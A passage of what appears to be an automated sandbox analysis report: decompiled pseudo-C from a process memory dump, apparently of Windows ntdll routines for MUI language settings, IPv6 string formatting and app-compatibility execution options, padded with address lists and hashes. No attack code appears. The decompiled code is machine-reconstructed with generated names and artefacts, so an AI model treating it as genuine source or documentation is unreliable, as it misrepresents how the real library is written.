                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t236 = _v16;
                                                                                                                                                                                                          							if( *_v16 != _t319) {
                                                                                                                                                                                                          								E020BE2A8(_t322,  &_v68, _t236);
                                                                                                                                                                                                          								if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                          									_a4 = _a4 + 1;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							if(_a4 == 0) {
                                                                                                                                                                                                          								E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                                                                          								_v52 = _v52 & 0x00000000;
                                                                                                                                                                                                          								_v32 = _v32 & 0x00000000;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							if(_v8 != 0) {
                                                                                                                                                                                                          								E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                          							_t318 = 0;
                                                                                                                                                                                                          							goto L46;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t257 = _v24;
                                                                                                                                                                                                          					_t322 = _t257 + 4;
                                                                                                                                                                                                          					_push(_t257);
                                                                                                                                                                                                          					_v40 = _t322;
                                                                                                                                                                                                          					E020D718A(_t257);
                                                                                                                                                                                                          					_t338 = _t335 + 4;
                                                                                                                                                                                                          					if(_t322 == _t318) {
                                                                                                                                                                                                          						_v20 = _t318;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_v20 = E020BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_v20 == _t318) {
                                                                                                                                                                                                          						_v40 = _t318;
                                                                                                                                                                                                          						goto L58;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						E020B2340(_v20, _v8, _v24);
                                                                                                                                                                                                          						_v16 = _v20;
                                                                                                                                                                                                          						_a4 = _t318;
                                                                                                                                                                                                          						_t261 = E020CE679(_v20, _t332);
                                                                                                                                                                                                          						_t335 = _t338 + 0x14;
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							_v12 = _t261;
                                                                                                                                                                                                          							if(_t261 == _t318) {
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_v12 = _v12 + 2;
                                                                                                                                                                                                          							 *_v12 = 0;
                                                                                                                                                                                                          							E020BE2A8(_v12,  &_v68, _v16);
                                                                                                                                                                                                          							if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                          								_a4 = _a4 + 1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_v16 = _v12;
                                                                                                                                                                                                          							_t261 = E020CE679(_v12, _t332);
                                                                                                                                                                                                          							_pop(_t322);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t269 = _v16;
                                                                                                                                                                                                          						if( *_v16 != _t318) {
                                                                                                                                                                                                          							E020BE2A8(_t322,  &_v68, _t269);
                                                                                                                                                                                                          							if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                          								_a4 = _a4 + 1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_a4 == _t318) {
                                                                                                                                                                                                          							E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                                                                          							_v40 = _t318;
                                                                                                                                                                                                          							_v20 = _t318;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_v8 != _t318) {
                                                                                                                                                                                                          							E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_v8 = _t318;
                                                                                                                                                                                                          						goto L30;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t284 = _v24;
                                                                                                                                                                                                          				_t322 = _t284 + 4;
                                                                                                                                                                                                          				_push(_t284);
                                                                                                                                                                                                          				_v48 = _t322;
                                                                                                                                                                                                          				E020D718A(_t284);
                                                                                                                                                                                                          				_t339 = _t335 + 4;
                                                                                                                                                                                                          				if(_t322 == _t318) {
                                                                                                                                                                                                          					_v28 = _t318;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_v28 = E020BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_v28 == _t318) {
                                                                                                                                                                                                          					_v48 = _t318;
                                                                                                                                                                                                          					goto L58;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					E020B2340(_v28, _v8, _v24);
                                                                                                                                                                                                          					_v16 = _v28;
                                                                                                                                                                                                          					_a4 = _t318;
                                                                                                                                                                                                          					_t288 = E020CE679(_v28, _t332);
                                                                                                                                                                                                          					_t335 = _t339 + 0x14;
                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                          						_v12 = _t288;
                                                                                                                                                                                                          						if(_t288 == _t318) {
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_v12 = _v12 + 2;
                                                                                                                                                                                                          						 *_v12 = 0;
                                                                                                                                                                                                          						E020BE2A8(_v12,  &_v68, _v16);
                                                                                                                                                                                                          						if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                          							_a4 = _a4 + 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_v16 = _v12;
                                                                                                                                                                                                          						_t288 = E020CE679(_v12, _t332);
                                                                                                                                                                                                          						_pop(_t322);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t296 = _v16;
                                                                                                                                                                                                          					if( *_v16 != _t318) {
                                                                                                                                                                                                          						E020BE2A8(_t322,  &_v68, _t296);
                                                                                                                                                                                                          						if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                          							_a4 = _a4 + 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_a4 == _t318) {
                                                                                                                                                                                                          						E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                                                                          						_v48 = _t318;
                                                                                                                                                                                                          						_v28 = _t318;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_v8 != _t318) {
                                                                                                                                                                                                          						E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_v8 = _t318;
                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}
                                                                                                                                                                                                          0x020d8ac5
                                                                                                                                                                                                          0x020d8ace
                                                                                                                                                                                                          0x02121bc9
                                                                                                                                                                                                          0x02121bce
                                                                                                                                                                                                          0x02121bd2
                                                                                                                                                                                                          0x02121bd2
                                                                                                                                                                                                          0x020d8ad8
                                                                                                                                                                                                          0x020d8aeb
                                                                                                                                                                                                          0x020d8aeb
                                                                                                                                                                                                          0x020d8af0
                                                                                                                                                                                                          0x020d8af4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d8af4
                                                                                                                                                                                                          0x020d8a42
                                                                                                                                                                                                          0x020d8926
                                                                                                                                                                                                          0x020d8929
                                                                                                                                                                                                          0x020d892c
                                                                                                                                                                                                          0x020d892d
                                                                                                                                                                                                          0x020d8930
                                                                                                                                                                                                          0x020d8935
                                                                                                                                                                                                          0x020d893a
                                                                                                                                                                                                          0x020d8b51
                                                                                                                                                                                                          0x020d8940
                                                                                                                                                                                                          0x020d8954
                                                                                                                                                                                                          0x020d8954
                                                                                                                                                                                                          0x020d895a
                                                                                                                                                                                                          0x02121b63
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d8960
                                                                                                                                                                                                          0x020d8969
                                                                                                                                                                                                          0x020d8973
                                                                                                                                                                                                          0x020d8976
                                                                                                                                                                                                          0x020d8979
                                                                                                                                                                                                          0x020d897e
                                                                                                                                                                                                          0x020d8981
                                                                                                                                                                                                          0x020d8981
                                                                                                                                                                                                          0x020d8986
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02121b6e
                                                                                                                                                                                                          0x02121b74
                                                                                                                                                                                                          0x02121b7b
                                                                                                                                                                                                          0x02121b8f
                                                                                                                                                                                                          0x02121b91
                                                                                                                                                                                                          0x02121b91
                                                                                                                                                                                                          0x02121b99
                                                                                                                                                                                                          0x02121b9c
                                                                                                                                                                                                          0x02121ba2
                                                                                                                                                                                                          0x02121ba2
                                                                                                                                                                                                          0x020d898c
                                                                                                                                                                                                          0x020d8992
                                                                                                                                                                                                          0x020d8999
                                                                                                                                                                                                          0x020d89ad
                                                                                                                                                                                                          0x02121ba8
                                                                                                                                                                                                          0x02121ba8
                                                                                                                                                                                                          0x020d89ad
                                                                                                                                                                                                          0x020d89b6
                                                                                                                                                                                                          0x020d89c8
                                                                                                                                                                                                          0x020d89cd
                                                                                                                                                                                                          0x020d89d0
                                                                                                                                                                                                          0x020d89d0
                                                                                                                                                                                                          0x020d89d6
                                                                                                                                                                                                          0x020d89e8
                                                                                                                                                                                                          0x020d89e8
                                                                                                                                                                                                          0x020d89ed
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d89ed
                                                                                                                                                                                                          0x020d895a
                                                                                                                                                                                                          0x020d883e
                                                                                                                                                                                                          0x020d8841
                                                                                                                                                                                                          0x020d8844
                                                                                                                                                                                                          0x020d8845
                                                                                                                                                                                                          0x020d8848
                                                                                                                                                                                                          0x020d884d
                                                                                                                                                                                                          0x020d8852
                                                                                                                                                                                                          0x020d8b49
                                                                                                                                                                                                          0x020d8858
                                                                                                                                                                                                          0x020d886c
                                                                                                                                                                                                          0x020d886c
                                                                                                                                                                                                          0x020d8872
                                                                                                                                                                                                          0x02121b0e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d8878
                                                                                                                                                                                                          0x020d8881
                                                                                                                                                                                                          0x020d888b
                                                                                                                                                                                                          0x020d888e
                                                                                                                                                                                                          0x020d8891
                                                                                                                                                                                                          0x020d8896
                                                                                                                                                                                                          0x020d8899
                                                                                                                                                                                                          0x020d8899
                                                                                                                                                                                                          0x020d889e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02121b21
                                                                                                                                                                                                          0x02121b27
                                                                                                                                                                                                          0x02121b2e
                                                                                                                                                                                                          0x02121b42
                                                                                                                                                                                                          0x02121b44
                                                                                                                                                                                                          0x02121b44
                                                                                                                                                                                                          0x02121b4c
                                                                                                                                                                                                          0x02121b4f
                                                                                                                                                                                                          0x02121b55
                                                                                                                                                                                                          0x02121b55
                                                                                                                                                                                                          0x020d88a4
                                                                                                                                                                                                          0x020d88aa
                                                                                                                                                                                                          0x020d88b1
                                                                                                                                                                                                          0x020d88c5
                                                                                                                                                                                                          0x02121b5b
                                                                                                                                                                                                          0x02121b5b
                                                                                                                                                                                                          0x020d88c5
                                                                                                                                                                                                          0x020d88ce
                                                                                                                                                                                                          0x020d88e0
                                                                                                                                                                                                          0x020d88e5
                                                                                                                                                                                                          0x020d88e8
                                                                                                                                                                                                          0x020d88e8
                                                                                                                                                                                                          0x020d88ee
                                                                                                                                                                                                          0x020d8900
                                                                                                                                                                                                          0x020d8900
                                                                                                                                                                                                          0x020d8905
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d8905

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • WindowsExcludedProcs, xrefs: 020D87C1
                                                                                                                                                                                                          • Kernel-MUI-Language-Allowed, xrefs: 020D8827
                                                                                                                                                                                                          • Kernel-MUI-Number-Allowed, xrefs: 020D87E6
                                                                                                                                                                                                          • Kernel-MUI-Language-SKU, xrefs: 020D89FC
                                                                                                                                                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 020D8914
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcspbrk
                                                                                                                                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 38%
                                                                                                                                                                                                          			E020F13CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                          				intOrPtr* _v16;
                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                          				intOrPtr _t71;
                                                                                                                                                                                                          				signed int _t78;
                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                          				char _t90;
                                                                                                                                                                                                          				signed int _t91;
                                                                                                                                                                                                          				signed int _t96;
                                                                                                                                                                                                          				intOrPtr _t108;
                                                                                                                                                                                                          				signed int _t114;
                                                                                                                                                                                                          				void* _t115;
                                                                                                                                                                                                          				intOrPtr _t128;
                                                                                                                                                                                                          				intOrPtr* _t129;
                                                                                                                                                                                                          				void* _t130;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t129 = _a4;
                                                                                                                                                                                                          				_t128 = _a8;
                                                                                                                                                                                                          				_t116 = 0;
                                                                                                                                                                                                          				_t71 = _t128 + 0x5c;
                                                                                                                                                                                                          				_v8 = 8;
                                                                                                                                                                                                          				_v20 = _t71;
                                                                                                                                                                                                          				if( *_t129 == 0) {
                                                                                                                                                                                                          					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                                                                          						if(_t96 != 0) {
                                                                                                                                                                                                          							L38:
                                                                                                                                                                                                          							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                                                                          								goto L5;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                                          								_t86 = E020E7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                                                          								L36:
                                                                                                                                                                                                          								return _t128 + _t86 * 2;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                                                                          						if(_t114 == 0) {
                                                                                                                                                                                                          							L33:
                                                                                                                                                                                                          							_t115 = 0x20b2926;
                                                                                                                                                                                                          							L35:
                                                                                                                                                                                                          							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                                          							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                                          							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                                          							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                                                          							_t86 = E020E7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                                                                          							goto L36;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_t114 != 0xffff) {
                                                                                                                                                                                                          							_t116 = 0;
                                                                                                                                                                                                          							goto L38;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_t114 != 0) {
                                                                                                                                                                                                          							_t115 = 0x20b9cac;
                                                                                                                                                                                                          							goto L35;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L33;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                          					_a8 = _t116;
                                                                                                                                                                                                          					_a4 = _t116;
                                                                                                                                                                                                          					_v12 = _t116;
                                                                                                                                                                                                          					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                                                                          						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                                                                          							_v8 = 6;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t90 = _v8;
                                                                                                                                                                                                          					if(_t90 <= _t116) {
                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                          						if(_a8 - _a4 <= 1) {
                                                                                                                                                                                                          							_a8 = _t116;
                                                                                                                                                                                                          							_a4 = _t116;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t91 = 0;
                                                                                                                                                                                                          						if(_v8 <= _t116) {
                                                                                                                                                                                                          							L22:
                                                                                                                                                                                                          							if(_v8 < 8) {
                                                                                                                                                                                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                                          								_t128 = _t128 + E020E7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							return _t128;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							L14:
                                                                                                                                                                                                          							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                                                                          								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                                                                          									_push(":");
                                                                                                                                                                                                          									_push(_t71 - _t128 >> 1);
                                                                                                                                                                                                          									_push(_t128);
                                                                                                                                                                                                          									_t128 = _t128 + E020E7707() * 2;
                                                                                                                                                                                                          									_t71 = _v20;
                                                                                                                                                                                                          									_t130 = _t130 + 0xc;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t78 = E020E7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                                                                          								_t130 = _t130 + 0x10;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_push(L"::");
                                                                                                                                                                                                          								_push(_t71 - _t128 >> 1);
                                                                                                                                                                                                          								_push(_t128);
                                                                                                                                                                                                          								_t78 = E020E7707();
                                                                                                                                                                                                          								_t130 = _t130 + 0xc;
                                                                                                                                                                                                          								_t91 = _a8 - 1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t91 = _t91 + 1;
                                                                                                                                                                                                          							_t128 = _t128 + _t78 * 2;
                                                                                                                                                                                                          							_t71 = _v20;
                                                                                                                                                                                                          							if(_t91 >= _v8) {
                                                                                                                                                                                                          								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}





















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                                                                          • Opcode ID: b8f5ab116968ede462a0007400573b9047fc11356d1e75fecad49d58ddd4233f
                                                                                                                                                                                                          • Instruction ID: c1a6b597a33180271ea0272841204055d2878db5b809f9756e78bb10c450640b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8f5ab116968ede462a0007400573b9047fc11356d1e75fecad49d58ddd4233f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D61E371D40759EADF65CF99C8909BEBBF5EF94300B14C12DEA9A46940D334A640EB60
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                          			E020E7EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v540;
                                                                                                                                                                                                          				unsigned int _v544;
                                                                                                                                                                                                          				signed int _v548;
                                                                                                                                                                                                          				intOrPtr _v552;
                                                                                                                                                                                                          				char _v556;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                          				unsigned int _t46;
                                                                                                                                                                                                          				unsigned int _t47;
                                                                                                                                                                                                          				unsigned int _t52;
                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                          				unsigned int _t62;
                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                          				intOrPtr _t72;
                                                                                                                                                                                                          				signed int _t73;
                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                          				void* _t75;
                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                          				void* _t77;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t33 =  *0x2192088; // 0x7750189a
                                                                                                                                                                                                          				_v8 = _t33 ^ _t73;
                                                                                                                                                                                                          				_v548 = _v548 & 0x00000000;
                                                                                                                                                                                                          				_t72 = _a4;
                                                                                                                                                                                                          				if(E020E7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                                                                          					__eflags = _v548;
                                                                                                                                                                                                          					if(_v548 == 0) {
                                                                                                                                                                                                          						goto L1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t62 = _t72 + 0x24;
                                                                                                                                                                                                          					E02103F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                                                                          					_t71 = 0x214;
                                                                                                                                                                                                          					_v544 = 0x214;
                                                                                                                                                                                                          					E020BDFC0( &_v540, 0, 0x214);
                                                                                                                                                                                                          					_t75 = _t74 + 0x20;
                                                                                                                                                                                                          					_t46 =  *0x2194218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                                                                          					__eflags = _t46;
                                                                                                                                                                                                          					if(_t46 == 0) {
                                                                                                                                                                                                          						goto L1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t47 = _v544;
                                                                                                                                                                                                          					__eflags = _t47;
                                                                                                                                                                                                          					if(_t47 == 0) {
                                                                                                                                                                                                          						goto L1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _t47 - 0x214;
                                                                                                                                                                                                          					if(_t47 >= 0x214) {
                                                                                                                                                                                                          						goto L1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_push(_t62);
                                                                                                                                                                                                          					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                                                                          					E02103F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                                                                          					_t52 = E020C0D27( &_v540, L"Execute=1");
                                                                                                                                                                                                          					_t76 = _t75 + 0x1c;
                                                                                                                                                                                                          					_push(_t62);
                                                                                                                                                                                                          					__eflags = _t52;
                                                                                                                                                                                                          					if(_t52 == 0) {
                                                                                                                                                                                                          						E02103F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                                                                          						_t71 =  &_v540;
                                                                                                                                                                                                          						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                                                                          						_t77 = _t76 + 0x14;
                                                                                                                                                                                                          						_v552 = _t56;
                                                                                                                                                                                                          						__eflags = _t71 - _t56;
                                                                                                                                                                                                          						if(_t71 >= _t56) {
                                                                                                                                                                                                          							goto L1;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							L10:
                                                                                                                                                                                                          							_t62 = E020C8375(_t71, 0x20);
                                                                                                                                                                                                          							_pop(_t69);
                                                                                                                                                                                                          							__eflags = _t62;
                                                                                                                                                                                                          							if(__eflags != 0) {
                                                                                                                                                                                                          								__eflags = 0;
                                                                                                                                                                                                          								 *_t62 = 0;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							E02103F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                                                                          							_t77 = _t77 + 0x10;
                                                                                                                                                                                                          							E0212E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                                                                          							__eflags = _t62;
                                                                                                                                                                                                          							if(_t62 == 0) {
                                                                                                                                                                                                          								goto L1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t31 = _t62 + 2; // 0x2
                                                                                                                                                                                                          							_t71 = _t31;
                                                                                                                                                                                                          							__eflags = _t71 - _v552;
                                                                                                                                                                                                          							if(_t71 >= _v552) {
                                                                                                                                                                                                          								goto L1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                                                                          					_push(3);
                                                                                                                                                                                                          					_push(0x55);
                                                                                                                                                                                                          					E02103F92();
                                                                                                                                                                                                          					_t38 = 1;
                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                          					return E020BE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L1:
                                                                                                                                                                                                          				_t38 = 0;
                                                                                                                                                                                                          				goto L2;
                                                                                                                                                                                                          			}



























                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02103f2e
                                                                                                                                                                                                          0x02103f30
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02103f3a
                                                                                                                                                                                                          0x02103f3b
                                                                                                                                                                                                          0x02103f53
                                                                                                                                                                                                          0x02103f64
                                                                                                                                                                                                          0x02103f69
                                                                                                                                                                                                          0x02103f6c
                                                                                                                                                                                                          0x02103f6d
                                                                                                                                                                                                          0x02103f6f
                                                                                                                                                                                                          0x0210e304
                                                                                                                                                                                                          0x0210e30f
                                                                                                                                                                                                          0x0210e315
                                                                                                                                                                                                          0x0210e31e
                                                                                                                                                                                                          0x0210e321
                                                                                                                                                                                                          0x0210e327
                                                                                                                                                                                                          0x0210e329
                                                                                                                                                                                                          0x00000000
